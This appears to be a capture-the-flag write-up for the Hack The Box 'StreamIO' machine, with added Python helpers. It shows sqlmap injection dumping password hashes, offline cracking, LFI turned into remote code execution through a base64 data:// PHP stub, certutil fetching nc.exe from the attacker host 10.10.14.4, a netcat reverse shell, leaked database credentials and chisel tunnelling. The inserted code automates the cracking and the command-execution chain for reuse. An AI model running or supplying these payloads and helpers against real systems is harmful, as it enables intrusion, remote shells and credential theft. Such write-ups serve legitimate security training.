Streamio
writeup: HTB_ StreamIO – Syn's writeups.pdf
{image of site}
- https://streamio.htb
- https://streamio.htb/register.php
- https://streamio.htb/login.php - sqlmap discovered the username field is injectable
- https://watch.streamio.htb
- https://watch.streamio.htb/search.php
nmap
sqlmap
The username parameter on https://streamio.htb/login.php is injectable
Table Scan
sqlmap -r login.req -p username --tables --batch -D STREAMIO
Database: STREAMIO
[2 tables]
+--------+
| movies |
| users |
+--------+
sqlmap -r login.req -p username --columns --batch -D STREAMIO -T users
Database: STREAMIO
Table: users
[4 columns]
+----------+-------+
| Column | Type |
+----------+-------+
| id | int |
| is_staff | bit |
| password | nchar |
| username | nchar |
+----------+-------+
sqlmap -r login.req -p username --columns --batch -D STREAMIO -T users --dump
Database: STREAMIO
Table: users
[4 columns]
+----------+-------+
| Column | Type |
+----------+-------+
| id | int |
| is_staff | bit |
| password | nchar |
| username | nchar |
+----------+-------+
id,is_staff,password,username
3,1,c660060492d9edcaa8332d89c99c9239,James
4,1,925e5408ecb67aea449373d668b7359e,Theodore
5,1,083ffae904143c4796e464dac33c1f7d,Samantha
6,1,08344b85b329d7efd611b7a7743e8a09,Lauren
7,1,d62be0dc82071bccc1322d64ec5b6c51,William
8,1,f87d3c0d6c8fd686aacc6627f1f493a5,Sabrina
9,1,f03b910e2bd0313a23fdd7575f34a694,Robert
10,1,3577c47eb1e12c8ba021611e1280753c,Thane
11,1,35394484d89fcfdb3c5e447fe749d213,Carmon
12,1,54c88b2dbd7b1a84012fabc1a4c73415,Barry
13,1,fd78db29173a5cf701bd69027cb9bf6b,Oliver
14,1,b83439b16f844bd6ffe35c02fe21b3c0,Michelle
15,1,0cfaaaafb559f081df2befbe66686de0,Gloria
16,1,b22abb47a02b52d5dfa27fb0b534f693,Victoria
17,1,1c2b3d8270321140e5153f6637d3ee53,Alexendra
18,1,22ee218331afd081b0dcd8115284bae3,Baxter
19,1,ef8f3d30a856cf166fb8215aca93e9ff,Clara
20,1,3961548825e3e21df5646cafe11c6c76,Barbra
21,1,ee0b8a0937abd60c2882eacb2f8dc49f,Lenord
22,1,0049ac57646627b8d7aeaccf8b6a936f,Austin
23,1,8097cedd612cc37c29db152b6e9edbd3,Garfield
24,1,6dcd87740abb64edfa36d170f0d5450d,Juliette
25,1,bf55e15b119860a6e6b5a164377da719,Victor
26,1,7df45a9e3de3863807c026ba48e55fb3,Lucifer
27,1,2a4e2cf22dd8fcb45adcb91be1e22ae8,Bruno
28,1,ec33265e5fc8c2f1b0c137bb7b3632b5,Diablo
29,1,dc332fb5576e9631c9dae83f194f8e70,Robin
30,1,384463526d288edcc95fc3701e523bc7,Stan
31,1,b779ba15cedfd22a023c4d8bcf5f2332,yoshihide
33,0,665a50ac9eaa781e4f7f04199db97a11,admin
34,0,098f6bcd4621d373cade4e832627b4f6,test
Usernames
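Between the dump above and the credential spray in the Foothold section sits an offline cracking step the writeup does not show. The following Python is an added example, not code from the writeup: it parses the sqlmap CSV (stripping the nchar padding space that sqlmap preserves), flags the 32-hex password values, and runs a dictionary attack treating them as unsalted MD5. That MD5 assumption is mine, supported by the test user's value equalling md5("test"); the three-row excerpt and the four-word wordlist are constructed for the example, and on the real box you would hand the hashes to hashcat (mode 0) or john with a full wordlist instead.

```python
"""Offline check of the dumped STREAMIO users rows.

Added example, not part of the original writeup. It assumes the 32-hex
password values are unsalted MD5 (the test user's value is md5("test"),
which supports that) and uses a small constructed wordlist; on the real
box you would feed hashcat/john a full wordlist instead.
"""
import hashlib
import re

# Constructed excerpt of the sqlmap CSV dump; the stray space before the
# comma is nchar padding that sqlmap preserves, so it must be stripped.
DUMP_CSV = """id,is_staff,password,username
31,1,b779ba15cedfd22a023c4d8bcf5f2332 ,yoshihide
33,0,665a50ac9eaa781e4f7f04199db97a11 ,admin
34,0,098f6bcd4621d373cade4e832627b4f6 ,test
"""

# Constructed wordlist; a real attempt uses rockyou or similar.
WORDLIST = ["password", "test", "admin", "123456"]

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def parse_dump(csv_text):
    """Return [(username, password_hash)] with padding stripped, skipping the header."""
    rows = []
    for line in csv_text.strip().splitlines()[1:]:
        _id, _is_staff, pw, user = [f.strip() for f in line.split(",")]
        rows.append((user, pw.lower()))
    return rows


def md5_shaped(rows):
    """Usernames whose hash field is 32 lowercase hex chars (MD5/NTLM length)."""
    return [user for user, pw in rows if HEX32.match(pw)]


def crack_md5(rows, wordlist):
    """Dictionary attack: hash each candidate once, then look every user up in the table."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[pw] for user, pw in rows if pw in lookup}


def spray_pairs(cracked):
    """username:password lines ready for a Burp Intruder pitchfork run or hydra."""
    return [f"{u}:{p}" for u, p in sorted(cracked.items())]


if __name__ == "__main__":
    rows = parse_dump(DUMP_CSV)
    print("MD5-shaped:", md5_shaped(rows))
    print("\n".join(spray_pairs(crack_md5(rows, WORDLIST))))
```

Only the constructed "test" row cracks with this toy wordlist; the point is the pipeline (strip padding, classify, crack, emit pairs), which is what feeds the Intruder attack in the next section.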
Foothold
An Intruder attack in Burp Suite showed that yoshihide:66boysandgirls.. is a valid credential pair. (The dumped password column holds 32-character hex digests, not plaintext, so the candidates for that spray had to be cracked offline first.)

Now when we login we have a valid session cookie

That gets us into the admin panel

Clicking through the admin panel options, the only real difference is the query parameter in the URL (?message, ?staff, ?movies), so trying a few other names turns up a ?debug= parameter.

An Intruder attack in Burp Suite confirms that this ?debug parameter gives us LFI.

Searching for local files in the web root turns up two of interest: index.php and master.php.
POC of RCE (the base64 in the include parameter decodes to system($_GET['cmd']);, served through PHP's data:// wrapper)
`curl -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=<yoshihide's session id>' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" 'https://streamio.htb/admin/?debug=master.php&cmd=dir' | grep '<input name="include" hidden>' -A 9999 |grep '</div>' -B 9999 | tail -n +3 |head -n -1`
After some enumeration I find that I can fetch the nc.exe binary onto the box with certutil.exe (served from the attacking machine) and then launch a reverse shell with it:
curl -s -k -X 'POST' -b "PHPSESSID=osm4mg0ik64h3j6u1ghslu2n2i" --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" "https://streamio.htb/admin/?debug=master.php&cmd=certutil.exe+-urlcache+-split+-f+http://10.10.14.4/nc.exe+c:\\windows\\temp\\nc.exe"
curl -s -k -X 'POST' -b "PHPSESSID=osm4mg0ik64h3j6u1ghslu2n2i" --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" "https://streamio.htb/admin/?debug=master.php&cmd=c:\\windows\\temp\\nc.exe+-e+cmd.exe+10.10.14.4+9002"
and that gives us a shell as the user yoshihide
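To avoid retyping the curl one-liner for every command, here is an added Python helper (not from the writeup) that builds the same data:// include payload and ?debug=master.php&cmd= URL, sends the POST with yoshihide's PHPSESSID, and extracts the command output the way the grep/tail/head chain does. The TARGET URL, marker strings and PHP stub come from the writeup; SAMPLE_PAGE, run_cmd and extract_output are constructed for this example, and the exact HTML around the output on the live page may differ from the sample, in which case the markers need adjusting.

```python
"""Helper for the ?debug= include -> data:// RCE chain.

Added example, not part of the original writeup. It assumes the behaviour
the curl one-liners rely on: master.php, when included via ?debug=,
itself include()s whatever the POST field `include` names, and PHP's
data:// wrapper is allowed, so a base64 PHP stub turns the LFI into
command execution. Network calls need the live box; the pure helpers
(payload building, output extraction) run offline.
"""
import base64
import html
import ssl
import urllib.parse
import urllib.request

TARGET = "https://streamio.htb/admin/"          # from the writeup
PHP_STUB = "system($_GET['cmd']);"                # same stub the curl commands carry
START_MARK = '<input name="include" hidden>'      # marker the grep chain keys on
END_MARK = "</div>"


def build_include_payload(php=PHP_STUB):
    """data:// URI carrying base64 PHP; this is the include= value for the POST body."""
    b64 = base64.b64encode(php.encode()).decode()
    return f"data://text/plain;base64,{b64}"


def build_url(cmd, base=TARGET, include="master.php"):
    """?debug=master.php&cmd=<command>, with the command URL-encoded."""
    return f"{base}?{urllib.parse.urlencode({'debug': include, 'cmd': cmd})}"


def extract_output(page):
    """Return the command output PHP writes right after the hidden include field.

    Mirrors the grep/tail/head chain of the curl one-liner: take the text
    after the hidden input, stop at the next </div>, unescape HTML entities.
    """
    start = page.find(START_MARK)
    if start == -1:
        raise ValueError("marker not found: session invalid or include failed")
    body = page[start + len(START_MARK):]
    end = body.find(END_MARK)
    if end != -1:
        body = body[:end]
    return html.unescape(body).strip()


def run_cmd(cmd, phpsessid, verify_tls=False):
    """Execute one command on the box (needs network and yoshihide's session cookie)."""
    ctx = ssl.create_default_context()
    if not verify_tls:                      # self-signed cert on the box, like curl -k
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    data = urllib.parse.urlencode({"include": build_include_payload()}).encode()
    req = urllib.request.Request(build_url(cmd), data=data, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", f"PHPSESSID={phpsessid}")
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        return extract_output(resp.read().decode(errors="replace"))


# Constructed response fragment shaped like what the grep chain expects.
SAMPLE_PAGE = (
    "<html><body><form>" + START_MARK + "\n"
    " Volume in drive C has no label.\n"
    " Directory of C:\\inetpub\\streamio.htb\\admin\n"
    "</div></form></body></html>"
)

if __name__ == "__main__":
    print(build_include_payload())
    print(build_url("dir"))
    print(extract_output(SAMPLE_PAGE))
    # Staging nc.exe as the writeup does is two calls against the live box:
    # run_cmd("certutil.exe -urlcache -split -f http://10.10.14.4/nc.exe c:\\windows\\temp\\nc.exe", sid)
    # run_cmd("c:\\windows\\temp\\nc.exe -e cmd.exe 10.10.14.4 9002", sid)
```

Because the command travels in the query string, anything with spaces or backslashes is URL-encoded by build_url rather than hand-escaped with `+` as in the curl lines; the PHP side sees the same $_GET['cmd'] either way.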

Checking the files on the box, we find DB creds in the PHP source:
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
Checking the listening ports, we see 1433 (the default MSSQL port) bound on 0.0.0.0, so a database service is most likely reachable from the box:
C:\inetpub\streamio.htb\admin>netstat -ta
Active Connections
Proto Local Address Foreign Address State Offload State
TCP 0.0.0.0:80 DC:0 LISTENING InHost
TCP 0.0.0.0:88 DC:0 LISTENING InHost
TCP 0.0.0.0:135 DC:0 LISTENING InHost
TCP 0.0.0.0:389 DC:0 LISTENING InHost
TCP 0.0.0.0:443 DC:0 LISTENING InHost
TCP 0.0.0.0:445 DC:0 LISTENING InHost
TCP 0.0.0.0:464 DC:0 LISTENING InHost
TCP 0.0.0.0:593 DC:0 LISTENING InHost
TCP 0.0.0.0:636 DC:0 LISTENING InHost
TCP 0.0.0.0:1433 DC:0 LISTENING InHost
TCP 0.0.0.0:3268 DC:0 LISTENING InHost
TCP 0.0.0.0:3269 DC:0 LISTENING InHost
TCP 0.0.0.0:5985 DC:0 LISTENING InHost
TCP 0.0.0.0:9389 DC:0 LISTENING InHost
TCP 0.0.0.0:47001 DC:0 LISTENING InHost
TCP 0.0.0.0:49664 DC:0 LISTENING InHost
TCP 0.0.0.0:49665 DC:0 LISTENING InHost
TCP 0.0.0.0:49666 DC:0 LISTENING InHost
TCP 0.0.0.0:49667 DC:0 LISTENING InHost
TCP 0.0.0.0:49673 DC:0 LISTENING InHost
TCP 0.0.0.0:49674 DC:0 LISTENING InHost
TCP 0.0.0.0:49686 DC:0 LISTENING InHost
TCP 0.0.0.0:49701 DC:0 LISTENING InHost
TCP 0.0.0.0:62495 DC:0 LISTENING InHost
TCP 10.10.11.158:53 DC:0 LISTENING InHost
TCP 10.10.11.158:139 DC:0 LISTENING InHost
TCP 10.10.11.158:443 10.10.14.4:38836 ESTABLISHED InHost
TCP 10.10.11.158:65133 10.10.14.4:9002 ESTABLISHED InHost
TCP 127.0.0.1:53 DC:0 LISTENING InHost
Using chisel to reverse-tunnel port 1433 out to the attacking machine:
On the attacking machine
chisel server -p 8000 --reverse
On the Windows box
chisel.exe client 10.10.14.4:8000 R:1433:127.0.0.1:1433